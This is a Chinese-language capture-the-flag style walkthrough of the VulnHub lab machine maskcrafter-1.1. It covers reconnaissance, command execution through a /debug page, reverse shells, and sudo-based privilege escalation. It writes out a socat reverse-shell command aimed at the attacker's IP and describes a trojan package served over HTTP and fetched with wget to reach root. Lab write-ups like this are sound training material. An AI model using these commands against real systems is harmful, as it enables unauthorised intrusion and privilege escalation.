VulnHub靶机maskcrafter-1.1渗透

110 阅读3分钟

靶机介绍 官方下载地址:www.vulnhub.com/entry/maskc… 这个靶机有两种办法获取用户,两种办法获取root,不需要暴力破解 在这里插入图片描述 运行环境: 靶机:网络设为NAT模式,IP地址:192.168.174.136 攻击机:同网段下的kali linux,IP地址为:192.168.174.135 开始渗透 运行靶机 在这里插入图片描述 获取靶机IP地址 在这里插入图片描述 扫描端口及其服务 在这里插入图片描述 在这里插入图片描述 这里看到了很多端口一个一个访问 先访问21端口的ftp服务 在这里插入图片描述 将pub目录下的两个文件下载到本地查看 在这里插入图片描述 NOTES.txt提示 1)。请为/调试web目录选择一个更强的密码。 用户名为“admin”是可以猜到的,但选择字典密码是一个很大的禁忌。 2)。请重新访问SQL代码以防止SQL注入,因为它现在的方式是绝对可怕的。 基本上,我们希望并祈祷黑客永远不会发现这一点。 根据提示得到用户admin的密码是一个弱密码,而且存在SQL注入 在这里插入图片描述 查看cred.zip需要解压密码一会再看 在这里插入图片描述 访问80端口,是一个登录页面,弱密码无法登录 在这里插入图片描述 扫一下80端口有没有其他目录 在这里插入图片描述 有很多目录 phpmyadmin使用弱密码无法登录 robots.txt指向了debug目录,刚刚也扫出来了debug目录,访问debug看一下 在这里插入图片描述 debug是一个命令执行的页面 在这里插入图片描述 在这里插入图片描述 由于是POST传参可以是使用burp或者HackBar更改命令执行 在这里插入图片描述 可以执行系统命令就可以执行反弹shell的命令了 使用工具利用python反弹shell 在这里插入图片描述 在这里插入图片描述 反弹成功,在网站的根目录的db.php中找到了数据库的用户名密码 在这里插入图片描述 使用刚刚获取的用户名密码登录phpmyadmin数据库管理系统 在这里插入图片描述 在这里插入图片描述在mydatabase数据库的creds表中找到了压缩包的密码 在这里插入图片描述 解压之后找到了userx用户的密码 在这里插入图片描述 为了方便使用ssh服务登录userx用户 在这里插入图片描述 使用sudo -l查看 在这里插入图片描述 看到evdaez可以执行whatsmyid.sh 将/bin/bash写到/scripts/whatsmyid.sh文件当中,然后将使用sudo提权evdaez 在这里插入图片描述 成功提权到evdaez,继续使用sudo 在这里插入图片描述 socat 是一个多功能的网络工具,名字来由是“Socket CAT”,可以看作是netcat的加强版 使用工具查看socat提权命令,也可以在gtfobins.github.io/ 这个网站搜索 在这里插入图片描述 在攻击机上面执行:socat file:tty,raw,echo=0 tcp-listen:4444 靶机执行:socat tcp-connect:192.168.174.135:4444 exec:/bin/sh,pty,stderr,setsid,sigint,sane 在这里插入图片描述 在这里插入图片描述 成功反弹researcherx用户的shell,使用python打开一个终端,继续使用sudo 在这里插入图片描述 还是查看提权的命令 在这里插入图片描述 有两种方法第一种是类似less的内置命令,第二种是通过携带命令的木马来提权 使用第二种方法,在攻击机上制作木马 这个方法需要使用FPM打包直接下载到kali即可 因为 kali 上已经有 ruby ,所以直接可以安装 rubygems, 下载参考链接:www.cnblogs.com/yanshicheng… 在这里插入图片描述 在攻击机上面使用python开启一个临时的http服务器 在这里插入图片描述 使用wget将木马下载到靶机 在这里插入图片描述 使用sudo就可以提权到root 在这里插入图片描述 切换到root目录查看flag 在这里插入图片描述 这个靶机就渗透完成了!